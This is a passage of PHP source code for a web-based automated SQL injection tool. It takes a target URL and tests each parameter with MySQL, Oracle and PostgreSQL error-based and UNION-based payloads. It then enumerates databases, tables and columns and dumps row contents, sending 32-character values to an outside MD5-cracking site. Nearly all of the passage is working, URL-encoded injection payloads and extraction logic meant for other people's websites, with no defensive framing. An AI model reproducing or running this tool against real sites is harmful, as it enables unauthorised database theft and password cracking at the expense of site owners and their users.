<table><tr><td>
<form action=\"".$_SERVER['PHP_SELF']."?frame=1\" method=\"post\" name=\"forma\" id=\"forma\">
url: <input type=\"text\" name=\"url\" id=\"url\" size=\"65\" value=\"http://\"/>
<input type=\"submit\" name=\"forma\" id=\"form\" value=\"search\"/><br>
<input type=\"checkbox\" name=\"checkerror\" id=\"checkerror\" value=\"check_e\" checked>Test for Error-based ||
<input type=\"checkbox\" name=\"checknion\" id=\"checknion\" value=\"check\"> Test for UNION query (slow) ||
<input type=\"checkbox\" name=\"speed\" id=\"speed\" value=\"speed\" checked> Fast scan (show only first injection point per vulnerability)
</form> 
";
if(isset($_POST['forma']) && $_POST['forma']=='search')
	{
	$url = $_POST["url"];
	if(strpos($url, "&") == true){
		//are we dealing with a multi-parameter url?
	echo "<b>Multiple parameter url detected</b><br/>";
	}
	
	$check = @$_POST["checknion"];
	$checke = @$_POST["checkerror"];
	$break = @$_POST["speed"];
	//i suck at names... and coding
	

	echo "<br><div style=\"position:absolute\" align=\"left\">".get_server_info($url)."</div>";
				$eurl_a=explode("&",$url);
			$ea = "0";
			$ef = count($eurl_a);
			$final=array();
			$final[0]=$eurl_a[0];
			
			while($ea<$ef){
				
			$sobras=explode($eurl_a[$ea],$url);
			$url2=str_replace($sobras[1],"",$url);
		
			//some sort of "heuristic" starts...
	
	$payload = $url2."'".$sobras[1];
	
	$url_s=file_get_contents($payload);
	
		if(strpos($url_s,"MySQL")==true){
			$type="m";
		}elseif(strpos($url_s,"Oracle")==true || strpos($url_s,"ORA-0")==true) {
			$type="o";
		}elseif(strpos($url_s,"PostgreSQL")==true){
			$type="p";
		}else{
			$type="u";
			}
			

	
	
	//some sort of heuristic ends
		
if($type== "m"){
if ($checke =='check_e'){// mysql error based detection
		$as=1;
		foreach($a as $detectar){
		echo ".";//LOL "progress bar"
		
		@$html = file_get_contents("$url2+$detectar+$sobras[1]");
		if(strpos($html, @$string3)==true){
			
			$mode_eb = $as;
			echo "<div><font color=blue>Detected: MySQL error based injection =)</font> <br>URL:  <font size=2 color=red>$url2</font>$sobras[1]<br/>QUERY: <font size=2 color=red>$detectar</font></div>";
			echo "
			<form action=\"".$_SERVER['PHP_SELF']."?frame=2\" method=\"post\" target=\"frame2\" name=\"tablas\" id=\"tablas\">
			<input type=\"hidden\" name=\"url\" id=\"url\" value=\"$url2\"/>
			<input type=\"hidden\" name=\"sobras\" id=\"sobras\" value=\"$sobras[1]\"/>
			<input type=\"hidden\" name=\"lol\" id=\"lol\" value=\"$mode_eb\"/>
			<input type=\"submit\" name=\"tablas\" id=\"tablas\" value=\"Get e-b\"/>
			</form> <br/>
			";
			$eb_i = 1;
			if($break =='speed'){
				break;
			}
			}
			$as++;
		}
} 
if ($check =='check'){//mysql union based detection
		$ass=1;
		foreach($b as $detectar2){
			echo ".";//LOL "progress bar"
		$payload=$url2.$detectar2.$sobras[1];
		$html8 = file_get_contents($payload);	
		
		if(strpos($html8, $string3)==true){
			$mode_uq = $ass;
			echo "<div><font color=blue>Detected: MySQL UNION query injection =)</font><br>URL:<font size=2 color=red>$url2</font>$sobras[1]<br/>QUERY: <font size=2 color=red>$detectar2</font></div>";
			echo "<form action=\"".$_SERVER['PHP_SELF']."?frame=2\" method=\"post\" target=\"frame2\" name=\"tablas\" id=\"tablas\">
		<input type=\"hidden\" name=\"url\" id=\"url\" value=\"$url2\"/>
		<input type=\"hidden\" name=\"sobras\" id=\"sobras\" value=\"$sobras[1]\"/>
		<input type=\"hidden\" name=\"lol\" id=\"lol\" value=\"$mode_uq\"/>
		<input type=\"submit\" name=\"tablas\" id=\"tablas\" value=\"Get u-q\"/>
		</form> <br/>
		";
			$uq_i = 1;
			if($break =='speed'){
				break;
			}
		}		
		$ass++;
	}
	}
}
elseif($type=="o"){
if ($checke =='check_e'){//oracle error based detection
		$asd=1;
		foreach($c as $detectar){
		echo ".";//LOL "progress bar"
		
		$html = file_get_contents("$url2+$detectar+$sobras[1]");
		
		if(strpos($html, $string3)==true){
			
			$mode_oeb = $asd;
			echo "<div><font color=blue>Detected: Oracle error based injection =)</font> <br>URL:  <font size=2 color=red>$url2</font>$sobras[1]<br/>QUERY: <font size=2 color=red>$detectar</font></div>";
			echo "
			<form action=\"".$_SERVER['PHP_SELF']."?frame=2\" method=\"post\" target=\"frame2\" name=\"tablas\" id=\"tablas\">
			<input type=\"hidden\" name=\"url\" id=\"url\" value=\"$url2\"/>
			<input type=\"hidden\" name=\"sobras\" id=\"sobras\" value=\"$sobras[1]\"/>
			<input type=\"hidden\" name=\"lol\" id=\"lol\" value=\"$mode_oeb\"/>
			<input type=\"submit\" name=\"tablas\" id=\"tablas\" value=\"Get oe-b\"/>
			</form> <br/>
			";
			$oc_i = 1;
			if($break =='speed'){
				break;
			}
			}
			$asd++;
		}
		
		
	} 
}
elseif($type=="p"){
	if ($checke =='check_e'){//oracle error based detection
		$asdf=1;
		foreach($d as $detectar){
		echo ".";//LOL "progress bar"
		
		$html = file_get_contents("$url2+$detectar+$sobras[1]");
		
		if(strpos($html, $string3)==true){
			
			$mode_pg = $asdf;
			echo "<div><font color=blue>Detected: PostgreSQL error based injection =)</font> <br>URL:  <font size=2 color=red>$url2</font>$sobras[1]<br/>QUERY: <font size=2 color=red>$detectar</font></div>";
			echo "
			<form action=\"".$_SERVER['PHP_SELF']."?frame=2\" method=\"post\" target=\"frame2\" name=\"tablas\" id=\"tablas\">
			<input type=\"hidden\" name=\"url\" id=\"url\" value=\"$url2\"/>
			<input type=\"hidden\" name=\"sobras\" id=\"sobras\" value=\"$sobras[1]\"/>
			<input type=\"hidden\" name=\"lol\" id=\"lol\" value=\"$mode_pg\"/>
			<input type=\"submit\" name=\"tablas\" id=\"tablas\" value=\"Get pg\"/>
			</form> <br/>
			";
			$pg = 1;
			if($break =='speed'){
				break;
			}
			}
			$asdf++;
		}
		
		
	} 
	}
			$ea++;	
			}
		if(($eb_i == 0) && ($uq_i==0) && ($oc_i==0)&& ($pg==0))
			{
			echo "<div><br><font color=red>No injection point detected =(</font> Try checking for union queries or uncheck \"Fast scan\"</div><br><br>";
			}//no shit Sherlock.
}
echo "</body>\n</html>";	

}
function frame2(){
html_header();
global $string3;
global $action, $detectar_t;
global $a,$payload_error,$b,$payload_union,$c,$payload_oracle, $d, $payload_postgre;


if(isset($_POST['tablas']) && $_POST['tablas']=='Get oe-b'){
	$sobras = $_POST['sobras'];
	$url = $_POST["url"];
	$mode_oeb = $_POST["lol"];
	
	
	$query_oerror=$c[$mode_oeb-1];
	//conteo_tablas
	$database=str_replace("$payload_oracle","(REPLACE(REPLACE(REPLACE(REPLACE((SELECT%20NVL(CAST(USER%20AS%20VARCHAR(4000))%2CCHR(32))%20FROM%20DUAL)%2CCHR(32)%2CCHR(58)||CHR(121)||CHR(58))%2CCHR(36)%2CCHR(58)||CHR(109)||CHR(58))%2CCHR(64)%2CCHR(58)||CHR(109)||CHR(58))%2CCHR(35)%2CCHR(58)||CHR(102)||CHR(58)))",$query_oerror);
	
	$database=file_get_contents("$url+$database+$sobras");
	
	$database=GetBetween($database);
	$database2 = $database;
	$database = str_split($database, 1);
	
	$awe=0;
	while($awe<count($database)){
	$database[$awe]="CHR(".ord($database[$awe]).")";
	$awe++;
	}
	$database = implode('||', $database); //database name in chr() format because FUCK YOU
	
	$query_oerrors=str_replace("$payload_oracle","(REPLACE(REPLACE(REPLACE(REPLACE((SELECT%20NVL(CAST(COUNT(TABLE_NAME)%20AS%20VARCHAR(4000))%2CCHR(32))%20FROM%20SYS.ALL_TABLES%20WHERE%20OWNER%20IN%20(".$database."))%2CCHR(32)%2CCHR(58)||CHR(121)||CHR(58))%2CCHR(36)%2CCHR(58)||CHR(109)||CHR(58))%2CCHR(64)%2CCHR(58)||CHR(109)||CHR(58))%2CCHR(35)%2CCHR(58)||CHR(102)||CHR(58)))",$query_oerror);
	
	@$tablas23 = $url.$query_oerrors.$sobras;
	
	
	echo "
	<form action=\"".$_SERVER['PHP_SELF']."?frame=3\" target=\"frame3\" method=\"post\" name=\"columnas\" id=\"columnas\">
	<input type=\"hidden\" name=\"url\" id=\"url\" value=\"$url\"/>
	<input type=\"hidden\" name=\"sobras\" id=\"sobras\" value=\"$sobras\"/>
	<select name=\"nombre\" id=\"nombre\">";
	
	$query_error_n=$query_oerror;
	//nombre tablas
	$query_error_n=str_replace("$payload_oracle", '(REPLACE(REPLACE(REPLACE(REPLACE((SELECT%20NVL(CAST(TABLE_NAME%20AS%20VARCHAR(4000))%2CCHR(32))%20FROM%20(SELECT%20TABLE_NAME%2CROWNUM%20AS%20LIMIT%20FROM%20SYS.ALL_TABLES%20WHERE%20OWNER%20IN%20($database)%20ORDER%20BY%201%20ASC)%20WHERE%20LIMIT%3D$i)%2CCHR(32)%2CCHR(58)||CHR(121)||CHR(58))%2CCHR(36)%2CCHR(58)||CHR(109)||CHR(58))%2CCHR(64)%2CCHR(58)||CHR(109)||CHR(58))%2CCHR(35)%2CCHR(58)||CHR(102)||CHR(58)))', $query_error_n);
	
	$i=1;   


	while($i <= GetBetween(file_get_contents("$tablas23"))){
	$query_error_nombre=str_replace('$i',"$i",$query_error_n);
	$query_error_nombre=str_replace('$database',"$database",$query_error_nombre);
	$_tablas = $url.$query_error_nombre.$sobras;
	
	$nombre = GetBetween(file_get_contents("$_tablas"));
	$tablas2=$nombre;
	$nombre2=str_split($nombre, 1);
	$awe=0;
	echo "<option value=\"";
	while($awe<count($nombre2)){
	$nombre2[$awe]="CHR(".ord($nombre2[$awe]).")";
	$awe++;
	}
	$nombre2 = implode('||', $nombre2);
	echo $nombre2.":".$tablas2;
	
	echo "\">$nombre</option>";
	$i++;

}
	//print $_tablas;
echo "</select>";
echo"<input type=\"hidden\" name=\"lol\" id=\"lol\" value=\"$mode_oeb\"/>";

echo"<input type=\"hidden\" name=\"database\" id=\"database\" value=\"$database\"/>";
echo"<input type=\"hidden\" name=\"database2\" id=\"database2\" value=\"$database2\"/>";
echo "	<input type=\"submit\" name=\"columnas\" id=\"columnas\" value=\"columns_oc\"/>";
echo "</form>";

}

if(isset($_POST['tablas']) && $_POST['tablas']=='Get e-b'){
	$url = $_POST["url"];
	$mode_eb = $_POST["lol"];
	$sobras = $_POST['sobras'];
	$query_error=$a[$mode_eb-1];
	$query_errors=str_replace("$payload_error","(SELECT%203830%20FROM(SELECT%20COUNT(%2A),CONCAT(0x3a6f79753a,(SELECT%20MID((IFnull(CAST(COUNT(%2A)%20AS%20CHAR),0x20)),1,50)%20FROM%20INFORMATION_SCHEMA.TABLES%20WHERE%20table_schema%20%3D%20DATABASE()%20),0x3a70687a3a,floor(rand(0)%2A2))x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x)a)",$query_error);
	
	@$tablas2 = "$url+$query_errors+$sobras";
	
	echo "
	<form action=\"".$_SERVER['PHP_SELF']."?frame=3\" target=\"frame3\" method=\"post\" name=\"columnas\" id=\"columnas\">
	<input type=\"hidden\" name=\"url\" id=\"url\" value=\"$url\"/>
	<input type=\"hidden\" name=\"sobras\" id=\"sobras\" value=\"$sobras\"/>
	<select name=\"nombre\" id=\"nombre\">";
	
	$query_error_n=$query_error;
	$query_error_n=str_replace("$payload_error", '(SELECT%207288%20FROM(SELECT%20COUNT(%2A),CONCAT(0x3a6f79753a,(SELECT%20MID((IFnull(CAST(table_name%20AS%20CHAR),0x20)),1,50)%20FROM%20INFORMATION_SCHEMA.TABLES%20WHERE%20table_schema%20%3D%20DATABASE()%20LIMIT%20$i,1),0x3a70687a3a,floor(rand(0)%2A2))x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x)a)', $query_error_n);
	$i = -1;   
	while ($i < (GetBetween(file_get_contents("$tablas2")))):
	$query_error_nombre=str_replace('$i',"$i",$query_error_n);
	$_tablas = "$url+$query_error_nombre+$sobras";
	
	$nombre = GetBetween(file_get_contents("$_tablas"));
	echo "<option value=\"".hexEncode($nombre)."\">$nombre</option>";
	$i++;
	endwhile;
	print $_tablas;
echo "</select>";
echo"<input type=\"hidden\" name=\"lol\" id=\"lol\" value=\"$mode_eb\"/>";
echo "	<input type=\"submit\" name=\"columnas\" id=\"columnas\" value=\"columns\"/>";
echo "</form>";

}

if(isset($_POST['tablas']) && $_POST['tablas']=='Get u-q'){
	$url = $_POST["url"];
	$mode_uq = $_POST["lol"];
$sobras = $_POST['sobras'];
$query_alfa=$b[$mode_uq-1];
$query_alfa=str_replace("CONCAT(0x3a6f79753a,0x4244764877697569706b,0x3a70687a3a)", "CONCAT(0x3a6f79753a,IFnull(CAST(COUNT(%2A)%20AS%20CHAR),0x20),0x3a70687a3a)", $query_alfa);
$query_alfa=str_replace("%23", "%20FROM%20INFORMATION_SCHEMA.TABLES%20WHERE%20table_schema%20%3D%20DATABASE()%23", $query_alfa);

$tablas2 = $url.$query_alfa.$sobras;

	echo "
	<form action=\"".$_SERVER['PHP_SELF']."?frame=3\" target=\"frame3\" method=\"post\" name=\"columnas\" id=\"columnas\">
	<input type=\"hidden\" name=\"url\" id=\"url\" value=\"$url\"/>
		<input type=\"hidden\" name=\"sobras\" id=\"sobras\" value=\"$sobras\"/>
	<select name=\"nombre\" id=\"nombre\>";

$query_beta=$query_alfa;
$query_beta=str_replace("%20FROM%20INFORMATION_SCHEMA.TABLES%20WHERE%20table_schema%20%3D%20DATABASE()%23","%23", $query_beta);
$query_beta=str_replace("CONCAT(0x3a6f79753a,IFnull(CAST(COUNT(%2A)%20AS%20CHAR),0x20),0x3a70687a3a)",'(SELECT%20CONCAT(0x3a6f79753a,IFnull(CAST(table_name%20AS%20CHAR),0x20),0x3a70687a3a)%20FROM%20INFORMATION_SCHEMA.TABLES%20WHERE%20table_schema%20%3D%20DATABASE()%20LIMIT%20$i,1)', $query_beta);
$i=-1;
	while ($i < GetBetween(file_get_contents("$tablas2"))):
	
	$query_beta_nombre=str_replace('$i',"$i",$query_beta);
	$_tablas = $url.$query_beta_nombre.$sobras;	
	
	$nombre = GetBetween(file_get_contents("$_tablas"));
	echo "<option value=\"".hexEncode($nombre)."\">$nombre</option>";

    $i++;
    	
	endwhile;
	
echo "</select>";
echo"<input type=\"hidden\" name=\"lol\" id=\"lol\" value=\"$mode_uq\"/>";
echo "	<input type=\"submit\" name=\"columnas\" id=\"columnas\" value=\"columns_uq\"/>";
echo "</form>";

	}

if(isset($_POST['tablas']) && $_POST['tablas']=='Get pg'){
	$sobras = $_POST['sobras'];
	$url = $_POST["url"];
	$mode_pg = $_POST["lol"];
	
	
	$query_perror=$d[$mode_pg-1];
	//conteo_tablas
	$query_perrors=str_replace("$payload_postgre","(SELECT%20COALESCE(CAST(COUNT(tablename)%20AS%20CHARACTER(10000)),(CHR(32)))%20FROM%20pg_tables%20WHERE%20schemaname%20IN%20((CHR(112)||CHR(117)||CHR(98)||CHR(108)||CHR(105)||CHR(99))))",$query_perror);
	

	
	$tablas23 = $url.$query_perrors.$sobras;
	

	echo "
	<form action=\"".$_SERVER['PHP_SELF']."?frame=3\" target=\"frame3\" method=\"post\" name=\"columnas\" id=\"columnas\">
	<input type=\"hidden\" name=\"url\" id=\"url\" value=\"$url\"/>
	<input type=\"hidden\" name=\"sobras\" id=\"sobras\" value=\"$sobras\"/>
	<select name=\"nombre\" id=\"nombre\">";
	
	$query_error_n=$query_perror;
	//nombre tablas
	$query_error_n=str_replace("$payload_postgre", '(SELECT%20COALESCE(CAST(tablename%20AS%20CHARACTER(10000)),(CHR(32)))%20FROM%20pg_tables%20WHERE%20schemaname%20IN%20((CHR(112)||CHR(117)||CHR(98)||CHR(108)||CHR(105)||CHR(99)))%20OFFSET%20$i%20LIMIT%201)', $query_error_n);
	
	$i=0;   


	while($i < GetBetween(file_get_contents("$tablas23"))){
	$query_error_nombre=str_replace('$i',"$i",$query_error_n);
		$_tablas = $url.$query_error_nombre.$sobras;
	
	$nombre = GetBetween(file_get_contents("$_tablas"));
	$tablas2=$nombre;
	$nombre2=str_split($nombre, 1);
	$awe=0;
	echo "<option value=\"";
	while($awe<count($nombre2)){
	$nombre2[$awe]="CHR(".ord($nombre2[$awe]).")";
	$awe++;
	}
	$nombre2 = implode('||', $nombre2);
	echo $nombre2.":".$tablas2;
	
	echo "\">$nombre</option>";
	$i++;

}
	//print $_tablas;
echo "</select>";
echo"<input type=\"hidden\" name=\"lol\" id=\"lol\" value=\"$mode_pg\"/>";
echo "	<input type=\"submit\" name=\"columnas\" id=\"columnas\" value=\"columns_pg\"/>";
echo "</form>";

}


}
function frame3(){
html_header();
global $string3;
global $action, $detectar_t;
global $a,$payload_error,$b,$payload_union,$c,$payload_oracle, $d, $payload_postgre;

$sobras=$_POST['sobras'];

if(isset($_POST['columnas']) && $_POST['columnas']=='columns')
	{
	$url = $_POST["url"];
	$table_n = $_POST["nombre"];
	$mode_eb = $_POST["lol"];
	$query_columna=$a[$mode_eb-1];
	$query_columnas=str_replace("$payload_error","(SELECT%201906%20FROM(SELECT%20COUNT(%2A),CONCAT(0x3a6f79753a,(SELECT%20MID((IFnull(CAST(COUNT(%2A)%20AS%20CHAR),0x20)),1,50)%20FROM%20INFORMATION_SCHEMA.COLUMNS%20WHERE%20table_name%3D$table_n%20AND%20table_schema%3DDATABASE()),0x3a70687a3a,floor(rand(0)%2A2))x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x)a)",$query_columna);
	@$columna =$url.$query_columnas.$sobras;		
	
	
	echo "
	<form action=\"".$_SERVER['PHP_SELF']."?frame=4\" target=\"frame4\" method=\"post\" name=\"datos\" id=\"datos\">
	<input type=\"hidden\" name=\"url\" id=\"url\" value=\"$url\"/>
		<input type=\"hidden\" name=\"sobras\" id=\"sobras\" value=\"$sobras\"/>
	<input type=\"hidden\" name=\"tn\" id=\"tn\" value=\"".asciiEncode($table_n)."\"/>";
	
	
	$query_columnas_n=$a[$mode_eb-1];
	$query_columnas_n=str_replace("$payload_error",'(SELECT%205724%20FROM(SELECT%20COUNT(%2A),CONCAT(0x3a6f79753a,(SELECT%20MID((IFnull(CAST(column_name%20AS%20CHAR),0x20)),1,50)%20FROM%20INFORMATION_SCHEMA.COLUMNS%20WHERE%20table_name%3D$table_n%20AND%20table_schema%3DDATABASE()%20LIMIT%20$i,1),0x3a70687a3a,floor(rand(0)%2A2))x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x)a)',$query_columnas_n);
	$i = 0;
	echo"<select name=\"nombre2\" id=\"nombre2\">";
	
	while ($i < GetBetween(file_get_contents("$columna"))):
	$query_columna_nombre=str_replace('$table_n',"$table_n",$query_columnas_n);
	$query_columna_nombre=str_replace('$i',"$i",$query_columna_nombre);
	
	@$_column = $url.$query_columna_nombre.$sobras;
	
	$nombre2 = GetBetween(file_get_contents("$_column"));
	echo "<option value=\"$nombre2\">$nombre2</option>";
    $i++;
	endwhile;
echo "</select>";
echo"<input type=\"hidden\" name=\"lol\" id=\"lol\" value=\"$mode_eb\"/>";
echo "<input type=\"submit\" name=\"datos\" id=\"datos\" value=\"data\"/>";
echo "</form>";
}
if(isset($_POST['columnas']) && $_POST['columnas']=='columns_uq')
	{
	$url = $_POST["url"];
	$table_n = $_POST["nombre"];
	$mode_uq = $_POST["lol"];
	
	$query_columnas=$b[$mode_uq-1];
	$query_columnasn=str_replace("$payload_union","CONCAT(0x3a6f79753a,IFnull(CAST(COUNT(*)%20AS%20CHAR),0x20),0x3a70687a3a)",$query_columnas);
	$query_columnasn=str_replace("%23","%20FROM%20INFORMATION_SCHEMA.COLUMNS%20WHERE%20table_name%3D$table_n%20AND%20table_schema%3DDATABASE()%23",$query_columnasn);
	
	$columna = $url.$query_columnasn.$sobras;
	
	echo "	<form action=\"".$_SERVER['PHP_SELF']."?frame=4\" target=\"frame4\" method=\"post\" name=\"datos\" id=\"datos\">
	<input type=\"hidden\" name=\"url\" id=\"url\" value=\"$url\"/>
		<input type=\"hidden\" name=\"sobras\" id=\"sobras\" value=\"$sobras\"/>
	<input type=\"hidden\" name=\"tn\" id=\"tn\" value=\"".asciiEncode($table_n)."\"/>";
	
	$query_columna_n=str_replace("$payload_union",'(SELECT%20CONCAT(0x3a6f79753a,IFnull(CAST(column_name%20AS%20CHAR),0x20),0x3a70687a3a)%20FROM%20INFORMATION_SCHEMA.COLUMNS%20WHERE%20table_name%3D$table_n%20AND%20table_schema%3DDATABASE()%20LIMIT%20$i,1)', $query_columnas);
	$i = 0;
	
	echo"<select name=\"nombre2\" id=\"nombre2\">";
	while ($i < GetBetween(file_get_contents("$columna"))):
	
		$c=str_replace('$i',"$i",$query_columna_n);
		$c=str_replace('$table_n',"$table_n",$c);
		$_column = $url.$c.$sobras;	
		
		$i++;
	$nombre2 = GetBetween(file_get_contents("$_column"));
	echo "<option value=\"$nombre2\">$nombre2</option>";
    
	endwhile;
	echo "</select>";
	echo"<input type=\"hidden\" name=\"lol\" id=\"lol\" value=\"$mode_uq\"/>";
	echo "<input type=\"submit\" name=\"datos\" id=\"datos\" value=\"data_uq\"/>";
	echo "</form>";
	}
if(isset($_POST['columnas']) && $_POST['columnas']=='columns_oc')
	{
	$tablas2 = $_POST["tablas2"];
	$url = $_POST["url"];
	$table = explode(":",$_POST["nombre"]);
	$table_n = $table[0];
	$table_n2 = $table[1];
	$mode_oc = $_POST["lol"];
	$database = $_POST["database"];
	$database2 = $_POST["database2"];
	$query_columna=$c[$mode_oc-1];


	$query_columnas=str_replace("$payload_oracle","(REPLACE(REPLACE(REPLACE(REPLACE((SELECT%20NVL(CAST(COUNT(*)%20AS%20VARCHAR(4000))%2CCHR(32))%20FROM%20SYS.ALL_TAB_COLUMNS%20WHERE%20TABLE_NAME%3D".$table_n.")%2CCHR(32)%2CCHR(58)||CHR(121)||CHR(58))%2CCHR(36)%2CCHR(58)||CHR(109)||CHR(58))%2CCHR(64)%2CCHR(58)||CHR(109)||CHR(58))%2CCHR(35)%2CCHR(58)||CHR(102)||CHR(58)))",$query_columna);
	$columna = $url.$query_columnas.$sobras;		
	
	echo "
	<form action=\"".$_SERVER['PHP_SELF']."?frame=4\" target=\"frame4\" method=\"post\" name=\"datos\" id=\"datos\">
	<input type=\"hidden\" name=\"url\" id=\"url\" value=\"$url\"/>
		<input type=\"hidden\" name=\"sobras\" id=\"sobras\" value=\"$sobras\"/>
		<input type=\"hidden\" name=\"database\" id=\"database\" value=\"$database\"/>
		<input type=\"hidden\" name=\"database2\" id=\"database2\" value=\"$database2\"/>
	<input type=\"hidden\" name=\"tn\" id=\"tn\" value=\"$table_n\"/>
	<input type=\"hidden\" name=\"tn2\" id=\"tn2\" value=\"$table_n2\"/>";
	
	
	$query_columnas_n=$c[$mode_oc-1];
	$query_columnas_n=str_replace("$payload_oracle",'(REPLACE(REPLACE(REPLACE(REPLACE((SELECT%20NVL(CAST(COLUMN_NAME%20AS%20VARCHAR(4000))%2CCHR(32))%20FROM%20(SELECT%20COLUMN_NAME%2CDATA_TYPE%2CROWNUM%20AS%20LIMIT%20FROM%20SYS.ALL_TAB_COLUMNS%20WHERE%20TABLE_NAME%3D$table_n%20ORDER%20BY%201%20ASC)%20WHERE%20LIMIT%3D$i)%2CCHR(32)%2CCHR(58)||CHR(121)||CHR(58))%2CCHR(36)%2CCHR(58)||CHR(109)||CHR(58))%2CCHR(64)%2CCHR(58)||CHR(109)||CHR(58))%2CCHR(35)%2CCHR(58)||CHR(102)||CHR(58)))',$query_columnas_n);
	$i = 1;

	echo"<select name=\"nombre2\" id=\"nombre2\">";
	
	while ($i <= GetBetween(file_get_contents("$columna"))):
	$query_columna_nombre=str_replace('$table_n',"$table_n",$query_columnas_n);
	$query_columna_nombre=str_replace('$i',"$i",$query_columna_nombre);
	
	$_column = $url.$query_columna_nombre.$sobras;


	$nombre2 = GetBetween(file_get_contents("$_column"));
	echo "<option value=\"$nombre2\">$nombre2</option>";
    $i++;
	endwhile;
echo "</select>";
echo"<input type=\"hidden\" name=\"lol\" id=\"lol\" value=\"$mode_oc\"/>";

echo "<input type=\"submit\" name=\"datos\" id=\"datos\" value=\"data_oc\"/>";
echo "</form>";
}
if(isset($_POST['columnas']) && $_POST['columnas']=='columns_pg')
	{
	$tablas2 = $_POST["tablas2"];
	$url = $_POST["url"];
	$table = explode(":",$_POST["nombre"]);
	$table_n = $table[0];
	$table_n2 = $table[1];
	$mode_pg = $_POST["lol"];
	$query_columna=$d[$mode_pg-1];


	$query_columnas=str_replace("$payload_postgre","(SELECT%20COALESCE(CAST(COUNT(*)%20AS%20CHARACTER(10000))%2C(CHR(32)))%20FROM%20pg_namespace,pg_type,pg_attribute%20b%20JOIN%20pg_class%20a%20ON%20a.oid%3Db.attrelid%20WHERE%20a.relnamespace%3Dpg_namespace.oid%20AND%20pg_type.oid%3Db.atttypid%20AND%20attnum>0%20AND%20a.relname%3D(".$table_n.")%20AND%20nspname%3D(CHR(112)||CHR(117)||CHR(98)||CHR(108)||CHR(105)||CHR(99)))",$query_columna);
	$columna = $url.$query_columnas.$sobras;		
	
	echo "
	<form action=\"".$_SERVER['PHP_SELF']."?frame=4\" target=\"frame4\" method=\"post\" name=\"datos\" id=\"datos\">
	<input type=\"hidden\" name=\"url\" id=\"url\" value=\"$url\"/>
		<input type=\"hidden\" name=\"sobras\" id=\"sobras\" value=\"$sobras\"/>
	<input type=\"hidden\" name=\"tn\" id=\"tn\" value=\"$table_n\"/>
	<input type=\"hidden\" name=\"tn2\" id=\"tn2\" value=\"$table_n2\"/>";

	
	$query_columnas_n=$d[$mode_pg-1];
	$query_columnas_n=str_replace("$payload_postgre",'(SELECT%20COALESCE(CAST(attname%20AS%20CHARACTER(10000)),(CHR(32)))%20FROM%20pg_namespace,pg_type,pg_attribute%20b%20JOIN%20pg_class%20a%20ON%20a.oid%3Db.attrelid%20WHERE%20a.relnamespace%3Dpg_namespace.oid%20AND%20pg_type.oid%3Db.atttypid%20AND%20attnum%3E0%20AND%20a.relname%3D($table_n)%20AND%20nspname%3D(CHR(112)||CHR(117)||CHR(98)||CHR(108)||CHR(105)||CHR(99))%20OFFSET%20$i%20LIMIT%201)',$query_columnas_n);
	$i = 0;

	echo"<select name=\"nombre2\" id=\"nombre2\">";
	
	while ($i < GetBetween(file_get_contents("$columna"))):
	$query_columna_nombre=str_replace('$table_n',"$table_n",$query_columnas_n);
	$query_columna_nombre=str_replace('$i',"$i",$query_columna_nombre);
	
	$_column = $url.$query_columna_nombre.$sobras;


	$nombre2 = GetBetween(file_get_contents("$_column"));
	echo "<option value=\"$nombre2\">$nombre2</option>";
    $i++;
	endwhile;
echo "</select>";
echo"<input type=\"hidden\" name=\"lol\" id=\"lol\" value=\"$mode_pg\"/>";
echo "<input type=\"submit\" name=\"datos\" id=\"datos\" value=\"data_pg\"/>";
echo "</form>";
}


}
function frame4(){
	html_header();
	global $a,$payload_error,$b, $payload_union,$databas,$c, $payload_oracle, $d, $payload_postgre;
	$sobras=$_POST['sobras'];

if(isset($_POST['datos']) && $_POST['datos']=='data')
	{
	$url = $_POST["url"];
	$nombre3 = $_POST["nombre2"];
	$tn = $_POST["tn"];
	$mode_eb = $_POST["lol"];

	$query_datos=$a[$mode_eb-1];
	$database=$query_datos;
	$database=str_replace("$payload_error","%20AND%20(SELECT%208041%20FROM(SELECT%20COUNT(%2A),CONCAT(0x3a6f79753a,(SELECT%20(database())),0x3a70687a3a,floor(rand(0)%2A2))x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x)a)",$database);
	$database=file_get_contents("$url+$database+$sobras");
		$database=GetBetween($database);
	$query_datoss=str_replace("$payload_error","(SELECT%207656%20FROM(SELECT%20COUNT(%2A),CONCAT(0x3a6f79753a,(SELECT%20MID((IFnull(CAST(COUNT(%2A)%20AS%20CHAR),0x20)),1,50)%20FROM%20$database.$tn),0x3a70687a3a,floor(rand(0)%2A2))x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x)a)",$query_datos);
		@$datos = $url.$query_datoss.$sobras;
	
	$query_datos_n=$query_datos;
	$query_datos_n=str_replace("$payload_error",'(SELECT%206968%20FROM(SELECT%20COUNT(%2A),CONCAT(0x3a6f79753a,(SELECT%20MID((IFnull(CAST($nombre3%20AS%20CHAR),0x20)),1,50)%20FROM%20$database.$tn%20LIMIT%20$i,1),0x3a70687a3a,floor(rand(0)%2A2))x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x)a)',$query_datos_n);
	
	$i = 0;
	echo "<table>";
	while ($i < (GetBetween(file_get_contents("$datos")))):
	
	$query_datos_nombre=str_replace('$database',"$database",$query_datos_n);
	$query_datos_nombre=str_replace('$nombre3',"$nombre3",$query_datos_nombre);
	$query_datos_nombre=str_replace('$tn',"$tn",$query_datos_nombre);
	$query_datos_nombre=str_replace('$i',"$i",$query_datos_nombre);
	
	@$_data = $url.$query_datos_nombre.$sobras;
	$i++;
	$nombre4 = GetBetween(file_get_contents("$_data"));
	if(strlen($nombre4) == 32){
	echo "<tr><td>$nombre4</td><td><div OnClick=\"window.open('http://www.hashchecker.de/$nombre4')\" style=\"color: blue\">MD5</div></td></tr>";
	}else{
	echo "<tr><td>$nombre4</td><td>";
	}
	endwhile;

echo "</table>";
}
if(isset($_POST['datos']) && $_POST['datos']=='data_uq')
	{
	$url = $_POST["url"];
	$nombre3 = $_POST["nombre2"];
	$tn = $_POST["tn"];
	$mode_uq = $_POST["lol"];
	$query_datos=$b[$mode_uq-1];
	
	$database=$query_datos;
	$database=str_replace("$payload_union","CONCAT(0x3a6f79753a,database(),0x3a70687a3a)",$database);
	$database=file_get_contents("$url+$database+$sobras");
	
	$name=GetBetween($database);
	
	
